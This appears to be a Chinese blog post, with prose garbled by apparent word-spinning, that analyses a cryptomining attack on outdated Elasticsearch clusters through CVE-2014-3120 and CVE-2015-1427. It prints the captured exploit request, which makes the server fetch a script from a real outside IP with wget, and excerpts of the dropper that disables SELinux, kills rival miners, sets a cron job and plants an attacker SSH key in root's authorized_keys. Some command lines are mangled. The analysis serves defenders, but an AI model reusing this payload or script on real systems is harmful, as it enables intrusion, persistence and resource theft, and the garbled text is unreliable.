0x00、前语

在开两会的前期,确保国家各个方面的稳定的事都说到日程上来,政府部门对互联网公司的监控也进入了严打阶段。在这样的大背景下,公司内部也对包括公共安全信息泄露做了一次大的排查,在此过程中,发现了一些事例,共享给我们。

0x01、侵略手段

对于mongodb、redis等数据库的进犯现已讲的十分多了,今日给我们共享的是针对不安全的Elasticsearch集群的进犯。这些进犯利用CVE-2014-3120和CVE-2015-1427。这两种进犯仅存在于旧版本的Elasticsearch中,并利用将脚本传递给查找查询的能力。把有用进犯载荷存储在里面并且履行。

态势感知-网络侵略防护体系中,对相关的侵略有检测功能,战略如下:

1、ETWEB_SERVERPossibleCVE-2014-3120ElasticSearchRemoteCodeExecutionAttempt
2、ETWEB_SERVERPossibleCVE-2015-1427ElasticSearchSandboxEscapeRemoteCodeExecutionAttempt

经过侵略检测体系,可以获取到有用的侵略载荷。

"POST/_search?prettyHTTP/1.1
Host:xxx.xx.113.xxx:9200
User-Agent:Go-http-client/1.1\r\nContent-Length:208
Connection:close\r\nAccept-Encoding:gzip
{
"size":1,
"script_fields":{
"lupin":{
"script":"java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime.exec(\"wgethttp://207.148.70.143:8506/IOFoqIgyC0zmf2UR/uuu.sh-P/tmp/sssooo\").getText"
}
}
}"

我们分析一下进犯载荷都干了什么事。

1、封闭SElinux,干掉现有挖矿进程

#!/bin/sh
setenforce0 2>/dev/null
echo SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/null
...
mv /usr/bin/wget /usr/bin/get
mv /usr/bin/curl /usr/bin/url
ps auxf|grep -v grep|grep "mine.moneropool.com"|awk "{print $2}"|xargs kill -9
ps auxf|grep -v grep|grep "pool.t00ls.ru"|awk "{print $2}"|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk "{print $2}"|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:3333"|awk "{print $2}"|xargs kill -9
ps auxf|grep -v grep|grep "zhuabcn@yahoo.com"|awk "{print $2}"|xargs kill -9
ps auxf|grep -v grep|grep "monerohash.com"|awk "{print $2}"|xargs kill -9
...
pkill -f biosetjenkins
pkill -f Loopback
pkill -f apaceha
pkill -f cryptonight
pkill -f ir29xc1
pkill -f conns
pkill -f irqbalance
pkill -f crypto-pool
pkill -f minexmr
...

2、在crontab增加定时升级程序,增加自己C2主机的sshkey,下载挖矿配置文件,配置防火墙、删去日志、开启反弹shell。

if [ -f "$rtdir" ]
then
echo "iamroot"
echo "goto1" > /etc/devtools
chattr -i /etc/devtool*
chattr -i /etc/config.json*
chattr -i /etc/update.sh*
chattr -i /root/.ssh/authorized_keys*
chattr -i /etc/systemctI
if [ -f "/usr/bin/crontab" ]
then
[[ $cont =~ "update.sh" ]] || (crontab -l;echo "*/10****sh /etc/update.sh >/dev/null 2/dev/null 2> ${crondir}
fi
chmod 700 /root/.ssh/
echo /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDPK+J+AIJvoCX67fFzfbNU5MT816KDmggltbgEI0hKZRdmMMe1ao/3CEgIzeqGbTff1suT/F1POUjGrf5t/ZqyIJzCIBKqNsxzM4tRNxrIGrqKnZypRlXdX+uZNaxmNJZGkkmtdeseekped0WnWk5SsvbYghBn4y9lZnsO+C1EgjLNWkbRPuoo/RkWTIXDmB7M7UcfYf+sSpApACt8DRydSEkeY709WtL0aANnN057Wnp/Okv+buM4mnkuteLtZvCAySt7PVBrCKyhItZx9VX/TMegljt/UPDaKfAeWF14Q1ORLRQkzZt9k+pY/ccNNbS53OmG0NhQ/awchmgXUpsProot@vultr.guest" >> /root/.ssh/authorized_keys

此时快讯

【Binance流动性挖矿新增支持SUI/USDT、SUI/BTC、FLOKI/USDT流动性池】金色财经报道,Binance流动性挖矿现已开放三个新的流动性池:SUI/USDT、SUI/BTC、FLOKI/USDT。

发表回复

您的电子邮箱地址不会被公开。 必填项已用*标注